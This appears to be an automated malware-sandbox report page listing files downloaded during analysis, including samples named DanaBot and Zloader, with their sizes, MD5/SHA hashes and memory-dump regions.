5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
a9f53fb00cc3f4484bd0fd29f341527c

SHA1
40062bed4f7b68cf9ec51a792e4a7f4f3b93735c

SHA256
661e6f876f3c747be9637a95e642f3ac473ba553171f7f46027c8c39b3dce166

SHA512
b16afab8309ecfe5f92f1c94dbe39acf3409f35549c92388e7260b4d848883b1231ed829bd5fab274161877ce06bc6948299752079bc462bb1fe5c8c7e04f145

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
6edd3ec13662970d9382e366fd5b1637

SHA1
7cf477b5b141911eeb452683179c0358466fa7e8

SHA256
1a92fc18bac074b20c9ac1f3e403812d4ebb8c2d806f7403c50f9966b80ee15d

SHA512
167ce871d070a4cbef5c55b110feade7e7782593b20911e0bf8c1b403324adfb7731779a073e975498c5d3e6dfcf5cfd78149a318661500a1837e3819505cc59

Download Submit
C:\Users\Admin\DOWNLO~1\DanaBot.dll

Filesize
2.4MB

MD5
7e76f7a5c55a5bc5f5e2d7a9e886782b

SHA1
fc500153dba682e53776bef53123086f00c0e041

SHA256
abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3

SHA512
0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

Download Submit
C:\Users\Admin\Downloads\Melting.exe

Filesize
12KB

MD5
833619a4c9e8c808f092bf477af62618

SHA1
b4a0efa26f790e991cb17542c8e6aeb5030d1ebf

SHA256
92a284981c7ca33f1af45ce61738479fbcbb5a4111f5498e2cb54931c8a36c76

SHA512
4f231fc16339d568b5cf9353133aeae835eb262dab68bc80d92f37b43df64dce4fae0e913cbaa3bb61351a759aeecf9d280bc5779b0853c980559a654d6cca11

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 410357.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 53386.crdownload

Filesize
1KB

MD5
8c409f1cd319a2698fb4fe195157750c

SHA1
1faf6332f072eb9f273ad62ee9b4d735c543e9b3

SHA256
78a232ce62088351cca6a325c396dfbbe66c38bbf1553a307b57fe0cadfd64a7

SHA512
c2e283cc9e5c991a8c73ec9318c69f5be3b8c83c7727a28764d6755c5db158e7384774d22ef5736c4c1809b19ed4c116c276f3d5b7aa5d1ca0ba4475dd527842

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 58898.crdownload

Filesize
2.7MB

MD5
48d8f7bbb500af66baa765279ce58045

SHA1
2cdb5fdeee4e9c7bd2e5f744150521963487eb71

SHA256
db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

SHA512
aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 870143.crdownload

Filesize
246KB

MD5
9254ca1da9ff8ad492ca5fa06ca181c6

SHA1
70fa62e6232eae52467d29cf1c1dacb8a7aeab90

SHA256
30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

SHA512
a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 90850.crdownload

Filesize
43KB

MD5
b2eca909a91e1946457a0b36eaf90930

SHA1
3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

SHA256
0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

SHA512
607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

Download Submit
C:\Users\Admin\Downloads\Zloader.xlsm

Filesize
93KB

MD5
b36a0543b28f4ad61d0f64b729b2511b

SHA1
bf62dc338b1dd50a3f7410371bc3f2206350ebea

SHA256
90c03a8ca35c33aad5e77488625598da6deeb08794e6efc9f1ddbe486df33e0c

SHA512
cf691e088f9852a3850ee458ef56406ead4aea539a46f8f90eb8e300bc06612a66dfa6c9dee8dcb801e7edf7fb4ed35226a5684f4164eaad073b9511189af037

Download Submit
memory/2304-2443-0x0000000005250000-0x000000000525A000-memory.dmp

Filesize
40KB

Download
memory/2360-2307-0x000001A1620F0000-0x000001A162112000-memory.dmp

Filesize
136KB

Download
memory/3200-2440-0x0000000000540000-0x0000000000550000-memory.dmp

Filesize
64KB

Download
memory/3200-2441-0x00000000052C0000-0x0000000005864000-memory.dmp

Filesize
5.6MB

Download
memory/3200-2442-0x0000000004DF0000-0x0000000004E82000-memory.dmp

Filesize
584KB

Download
memory/4888-2118-0x00007FFCABC50000-0x00007FFCABC60000-memory.dmp

Filesize
64KB

Download
memory/4888-2123-0x00007FFCA92F0000-0x00007FFCA9300000-memory.dmp

Filesize
64KB

Download
memory/4888-2122-0x00007FFCA92F0000-0x00007FFCA9300000-memory.dmp

Filesize
64KB

Download
memory/4888-2121-0x00007FFCABC50000-0x00007FFCABC60000-memory.dmp

Filesize
64KB

Download
memory/4888-2120-0x00007FFCABC50000-0x00007FFCABC60000-memory.dmp

Filesize
64KB

Download
memory/4888-2119-0x00007FFCABC50000-0x00007FFCABC60000-memory.dmp

Filesize
64KB

Download
memory/4888-2117-0x00007FFCABC50000-0x00007FFCABC60000-memory.dmp

Filesize
64KB

Download
memory/5084-2641-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/5084-2578-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/5780-2076-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/5972-2113-0x00000000022E0000-0x000000000254B000-memory.dmp

Filesize
2.4MB

Download
memory/5972-2346-0x00000000022E0000-0x000000000254B000-memory.dmp

Filesize
2.4MB

Download
memory/5972-2075-0x00000000022E0000-0x000000000254B000-memory.dmp

Filesize
2.4MB

Download
memory/6104-2640-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/6104-2577-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download